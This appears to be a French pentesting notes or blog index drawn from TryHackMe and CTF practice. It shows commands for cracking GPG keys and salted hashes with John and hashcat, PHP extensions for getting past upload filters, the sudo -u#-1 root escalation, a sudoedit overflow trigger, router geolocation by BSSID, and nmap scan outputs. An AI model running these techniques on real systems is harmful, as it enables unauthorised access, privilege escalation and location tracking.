gpg –import tryhackme.asc gpg –list-keys gpg –export-secret-key –armor tryhackme > tryhackme.priv gpg2john tryhackme.priv > gpghashtest john -w rockyou.txt gpghashtest gpg credential.pgp #pour décrypterc je n’ai pas réussi à faire fonctionner correctement la version john-1.9.0 jumbo pour linux. La version Windows fonctionne correctement
Pour cracker un hash de ce type, il faut ajouter à la suite du hash le salt e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme par la suite, on peut essayer de le cracker. Ici, on essaie des combinaisons de chiffre (longueur maximale de 12 déterminée par le mask hashcat -m 160 -a 3 -1 ?d –increment hash.txt ?1?1?1?1?1?1?1?1?1?1?1?1
Parfois le upload d’un fichier php est impossible. Il est possible d’essayer d’autres extensions qui seront peut-être acceptés: .pht .phpt .phtml .php3 .php4 .php5 .php6
le fichier sudoers ressemble à ceci myhost r0cker (ALL, !root) /bin/bash normalement, avec ces réglages r0cker peut exécuter /bin/bash comme n’importe lequel usager excepté root. seul qu’il y a un bug si sudo est vulnérable, alors sudo -u#-1 /bin/bash
Vous pouvez retrouver l’adresse physique d’un routeur en faisant la recherche sur wigle.net avec son adresse MAC BSSID) Vous pouvez aussi obtenir le nom SSID à partir du BSSID. Il y a aussi la possibilité de rechercher par MAC bluetooth. Des millions de tours cellulaires ont également leur positionnement dans la banque de données.
La box linux (Code: 1) fonctionne sur Linux Mint et a permis de pratiquer mes habilités pour trouver des failles de vulnérabilité. Tout d’abord, j’ai fait l’inventaire des services offerts par cette machine. nmap -sC -sV -oN 192.168.2.173 # Nmap 7.91 scan initiated Wed Jun 16 18:18:18 2021 as: nmap -sC -sV -oV 192.168.2.173 Nmap … Continuer la lecture
On scanne, on obtient # Nmap 7.91 scan initiated Sun Jun 13 18:46:39 2021 as: nmap -sC -sV -oV 192.168.2.172 Nmap scan report for 192.168.2.172 Host is up (0.0040s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.5 (protocol 2.0) | ssh-hostkey: | 3072 bf:ba:23:4e:69:37:69:9f:23:ae:21:35:98:4d:39:fa (RSA) | 256 ed:95:53:52:ef:70:1f:c0:0e:3c:d8:be:35:fc:3a:93 … Continuer la lecture
sudoedit -s ‘\’ `perl -e ‘print “A” x 65536’`
Apache et d’autres serveurs http peuvent retourner une réponse différente si nous utilisons le protocole HTTP3. Ce n’est pas un protocole fréquemment utilisé et les clients HTTP3 sont plutôt rares. L’utilitaire curl supporte ce protocole, mais il faut le compiler avec les options nécessaires. Voici une façon de compiler les librairies nécessaires et de construire … Continuer la lecture
One time pad, Caesar, ROT13